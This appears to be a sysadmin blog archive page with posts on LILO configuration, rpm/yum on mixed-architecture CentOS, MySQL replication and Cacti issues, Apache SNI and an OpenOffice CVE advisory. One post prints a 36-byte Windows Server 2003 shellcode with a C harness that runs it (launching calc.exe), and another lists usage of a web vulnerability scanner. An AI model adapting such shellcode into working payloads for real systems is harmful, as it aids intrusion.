Mar 18

linux Problem with Lilo Boot Loader

By jason Linux/Unix Oprating system No Comments »

Lately, we installed additional memory on our Debian (lenny) servers and installed ‘bigmem’ kernel for our 32-bit systems to recognize more than 3GB of ram. Bigmem kernel installations went fine on servers with Grub as their boot loader – most of them uses Grub. But on one machine with Lilo as boot loader, it didn’t boot on bigmem kernel and below was the entry on /etc/lilo.conf.

# Boot up Linux by default.
default=Linux

image=/vmlinuz
label=Linux
read-only
# restricted
# alias=1
initrd=/initrd.img
image=/vmlinuz.old
label=LinuxOLD
read-only
optional
# restricted
# alias=2
initrd=/initrd.img.old

From this config I don’t see the details of which kernel is the old one and the bigmem. I also tried to set the default to kernel with “LinuxOLD” label but it points to the same kernel (not the bigmem). I solved my problem by modifying the /etc/lilo.conf config as follows:

# image=/vmlinuz
image=/boot/vmlinuz-2.6.26-2-686-bigmem
initrd=/boot/initrd.img-2.6.26-2-686-bigmem
label=Linux
read-only
# restricted
# alias=1
#initrd=/initrd.img

NOTE: Don’t forget to test first your changes on the /etc/lilo.conf by running ‘lilo’ command – this will verify your changes.

Tagged with:
Mar 17

OpenOffice VBA Macro Restrictions Remote Security Bypass Vulnerability

By jason Linux/Unix Oprating system No Comments »

Version: 

Ubuntu Ubuntu Linux 9.10 sparc
Ubuntu Ubuntu Linux 9.10 powerpc
Ubuntu Ubuntu Linux 9.10 lpia
Ubuntu Ubuntu Linux 9.10 i386
Ubuntu Ubuntu Linux 9.10 amd64
Ubuntu Ubuntu Linux 9.04 sparc
Ubuntu Ubuntu Linux 9.04 powerpc
Ubuntu Ubuntu Linux 9.04 lpia
Ubuntu Ubuntu Linux 9.04 i386
Ubuntu Ubuntu Linux 9.04 amd64
Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
SuSE OpenOffice for Windows 0
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP3
S.u.S.E. SUSE Linux Enterprise Desktop 10 SP2
S.u.S.E. SLED 11
S.u.S.E. SLE SDK 10 SP3
S.u.S.E. SLE SDK 10 SP2
S.u.S.E. SLE 11
S.u.S.E. openSUSE 11.2
S.u.S.E. openSUSE 11.1
S.u.S.E. openSUSE 11.0
S.u.S.E. Novell Linux Desktop 9
OpenOffice OpenOffice 3.1.1
OpenOffice OpenOffice 3.1
OpenOffice OpenOffice 2.4.3
OpenOffice OpenOffice 2.4.2
OpenOffice OpenOffice 2.4.1
OpenOffice OpenOffice 2.3.1
OpenOffice OpenOffice 2.3
OpenOffice OpenOffice 2.2.1
OpenOffice OpenOffice 2.2
OpenOffice OpenOffice 2.0.4
OpenOffice OpenOffice 2.0.3 -1
OpenOffice OpenOffice 2.0.3
OpenOffice OpenOffice 2.0.2
OpenOffice OpenOffice 2.0.1
OpenOffice OpenOffice 2.0 Beta
OpenOffice OpenOffice 3.2
OpenOffice OpenOffice 2.4
OpenOffice OpenOffice 2.2
OpenOffice OpenOffice 2.1
Debian Linux 5.0 sparc
Debian Linux 5.0 s/390
Debian Linux 5.0 powerpc
Debian Linux 5.0 mipsel
Debian Linux 5.0 mips
Debian Linux 5.0 m68k
Debian Linux 5.0 ia-64
Debian Linux 5.0 ia-32
Debian Linux 5.0 hppa
Debian Linux 5.0 armel
Debian Linux 5.0 arm
Debian Linux 5.0 amd64
Debian Linux 5.0 alpha
Debian Linux 5.0
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 armel
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0


Description:
Bugtraq ID:38245
CVE:CVE-2010-0136

OpenOffice is prone to a remote security-bypass vulnerability.

An attacker can exploit this issue to bypass intended restrictions on macro code,
which may allow the attacker to obtain sensitive information or launch further 
attacks.

Details on this issue are not available. We will update this BID as more 
information emerges.
Tagged with:
Mar 16

Windows Server 2003 Enterprise Edition SP1 ita calc.exe shellcode 36 bytes

By jason Security Tools No Comments »

#include <stdio.h>
#include <string.h>

char liscker[] = 
"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00"; 

int main(int argc, char **argv) 

    int (*shellcode)(); 
    shellcode = (int (*)()) liscker; 
    (int)(*shellcode)();
}

Tagged with:
Mar 15

Apache Supports Multiple SSL on Single IP Address

By jason Apache Server No Comments »

With the release of Apache 2.2.12, we can now configure multiple SSL sites in one IP address. It is available of you have Server Name Indication (SNI) extension for OpenSSL. Visit TechRepublic’s post on “Configure Apache to support multiple SSL sites on a single IP address” for details and vhost sample configuration. And for complete reference please refer to this page “SSL with Virtual Hosts Using SNI” and Apache mod_ssl documentation.

We’ll try this on our server and hopefully offer this to our shared hosting clients who wants SSL but not interested in paying extra for a dedicated ip address

Tagged with:
Mar 14

rhel/centos x86_64 and i386 packages mess

By jason Linux/Unix Oprating system No Comments »

Anyone running centos/rhel x86_64 systems has probably noticed that redhat has a strange way to install a mix of i386 and x86_64 rpms on such a systems. This is how redhat is using the 64bit architecture in a mixed way to be able to support also i386 applications. This is completely different from how for example debian does this where you will not see by default any i386 libraries or duplicate applications installed (you can install and use ia32 libraries for compatibility reasons but the user is in full control on this process). The way how this works in rhel is confusing; let’s take a simple example (the commands are taken from a clean centos5.3 install with the base packages selected): let’s see what version of ncurses we have on the system:
rpm -qa | grep ncurses
ncurses-5.5-24.20060715
ncurses-5.5-24.20060715
what? why is this listed twice? hmm… Running: rpm -qi ncurses-5.5-24.20060715 will also list the package twice (but doesn’t show the difference). We can assume one is i386 and one is x86_64 right? but we can’t see this.

To overcome this issue, and at least have rpm report the proper versions we have to add in our rpmmacros file a new line like: “%_query_all_fmt %%{name}-%%{version}-%%{release}.%%{arch}” that will add to the rpm output the architecture and allow us to see the this:

cat >> ~/.rpmmacros
%_query_all_fmt %%{name}-%%{version}-%%{release}.%%{arch}

and now running the same command will return a more intuitive and meaningful:

rpm -qa | grep ncurses

ncurses-5.5-24.20060715.x86_64

ncurses-5.5-24.20060715.i386

This doesn’t fix anything in how yum will install duplicate programs or libraries, but at least it will allow us to see the full name of the packages in rpm commands. Theoretically people should be able to add into yum.conf (this is the default anyway, so you might have it already):

exactarch=1

and yum will install by default the packages of the arch it is running on (x86_64 in our case). Still, this will not prevent i386 dependencies to show up and be installed. In case you want to completely ignore other arch packages add in the [main] section of /etc/yum.conf to exclude all 32bit packages,:

exclude=*.i386 *.i586 *.i686

and this will completely exclude them completely from yum operations. Please use this with care, and only if you have a full understanding of the implications to exclude those packages.

Even if you don’t exclude the 32bit packages as shown above, it is a good idea to add the arch to all yum operations (like install, remove, etc.), like:

yum install ncurses.x86_64

Hopefully you found this post useful, and have now a better understanding on how rhel/centos use the i368 and x86_64 packages and libraries with rpm and yum on a 64bit installation.

Tagged with:
Mar 13

Cacti and MySQL counters problem

By jason Mysql Server No Comments »

We recently came across a problem with Cacti and the MySQL counters. For those of you who don’t know how to integrate MySQL statistics into Cacti have a look at this: http://code.google.com/p/mysql-cacti-templates/. These templates are a great way to gain some insight into how your MySQL database servers perform. The templates are actually PHP pages that query the databases through a variety of commands like SHOW STATUS and SHOW ENGINE INNODB STATUS.

The issue that we encountered was that some statistics like the InnoDB buffer pool activity were not displaying anything for one server. Other servers were displaying it just fine and other statistics for that server were also fine.

Among other things the SHOW ENGINE INNODB STATUS command shows deadlock information pertaining to the last deadlock that the InnoDB engine encountered. In some cases this information will be quite extensive and this causes a problem. The output of this command is one giant text field with a limit of 64KB. If the deadlock information is very large other information will get cut off which means certain statistics are lost. The easy fix for this is to restart the database server but in case this is not an option you can always use the innotop utility to wipe the deadlock information by causing a small deadlock.

Tagged with:
Mar 12

Apache Now Supports Multiple SSL on Single IP Address

By jason Apache Server No Comments »

With the release of Apache 2.2.12, we can now configure multiple SSL sites in one IP address. It is available of you have Server Name Indication (SNI) extension for OpenSSL. Visit TechRepublic’s post on “Configure Apache to support multiple SSL sites on a single IP address” for details and vhost sample configuration. And for complete reference please refer to this page “SSL with Virtual Hosts Using SNI” and Apache mod_ssl documentation.

We’ll try this on our server and hopefully offer this to our shared hosting clients who wants SSL but not interested in paying extra for a dedicated ip address.

Tagged with:
Mar 11

Free website security scanner tools – wwwscan

By jason Security Tools No Comments »

wwwscan is a very good free website security scanner tools,It can help you improve your website security level,hope it can help you.

<Usage>:  wwwscan <HostName|Ip> [Options]
<Options>:
          -p port        : set http/https port
          -m thread      : set max thread
          -t timeout     : tcp timeout in seconds
          -r rootpath    : set root path to scan
          -ssl           : will use ssl
<Example>:
          wwwscan www.target.com -p 8080 -m 10 -t 16
          wwwscan www.target.com -r "/test/" -p 80
          wwwscan www.target.com –ssl

You can download it from here.

Tagged with:
Mar 10

CentOS 5.4 released

By jason Linux/Unix Oprating system No Comments »

Almost two months after RHEL5.4, Centos 5.4 was released on the 21st October. This version includes various changes into the virtualization field and it includes support for KVM (kernel-based virtual machine) hypervisor and the Xen hypervisor.

Also this release features many bug fixes and security updates, and should be an easy upgrade for users running centos5.x:
yum update

For the full list of packages changed/added please see the centos5.4 release notes: http://wiki.centos.org/Manuals/ReleaseNotes/CentOS5.4

Tagged with:
Mar 09

Syntax error on MySQL replication slave

By jason Mysql Server No Comments »

Here’s an interesting one, what if you have a MySQL replication setup and the slave stops replicating with a syntax error? The slave should be executing the exact same commands as the master, right? Well, as it turns out, yes and no. There is a bug in MySQL that has been fixed in 5.0.56 according to the bug report. It’s a long story and it’s worth the read but what happens is that a timeout in the network connection between the master and the slave can cause the master to resend part of packet that it sent before. The slave handled the previous packet correctly so it’s not expecting a resend and as a result it starts writing some garbage to the relay log (which is where it stored the statements it will execute). The SQL command gets mangled in the process and when the slave tries to execute it, voila, a syntax error.

To fix this you can use the CHANGE MASTER command to set the slave to the master bin log file and position that shows up in the SHOW SLAVE STATUS output. Make sure you use the Relay_Master_Log_File and Exec_Master_Log_Pos fields since they indicate what position in the master binlog the slave actually thought it was executing. Keep in mind that corruption and its effects are hard to predict. It will definitely be useful to compare the master and slave afterward using the MaatKit tools.

As some more background, the server log will be probably show and error like this to indicate there was a network error:
[ERROR] Error reading packet from server: Lost connection to MySQL server during query (server_errno=2013)

And finally, if you do read the entire bug thread you will notice that the original developer of MySQL also has an opinion on this.

Tagged with:
Previous Entries
preload preload preload